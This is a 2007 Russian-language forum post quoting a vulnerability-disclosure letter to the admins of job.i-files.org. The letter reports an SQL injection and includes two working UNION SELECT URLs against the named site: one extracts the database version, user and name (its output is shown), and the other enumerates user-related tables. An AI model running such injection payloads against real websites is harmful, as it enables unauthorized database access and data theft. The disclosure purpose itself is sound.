Показать сообщение отдельно

  #8  
Старый 27.09.2007, 02:52
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Письмо админам ресурса.. было отправлено более недели назад

Цитата:
Здравствуйте, уважаемые!

Довожу до Вашего сведения, что в вашем движке, которому соответствет URL
job.i-files.org, мною обнаружена уязвимость класса SQL-Injection,
позволяющая выполнить произвольный SQL-запрос в базе данных приложения с правами соответствующего пользователя. Пример уязвимости:

1)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,%20version(),%20user(),%20databa se()),16,17,18,19,20,21,22,23,24/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2&currency=0&last_s_id=0
'

5.0.32-Debian_7etch1-log:job@mail.101.com.ua:job

2)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,table_name,table_schema),16,17,1 8,19,20,21,22,23,24+from+information_schema.tables +where+table_name+like+'%25user%25'/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2&currency=0&last_s_id=0
'

ну и так далее)

Прощу принять во внимание предоставленную информацию, и принять меры к
устранению уязвимости пока это не привело к плачевным результатам.

з.ы. админы уведомлены
 
Ответить с цитированием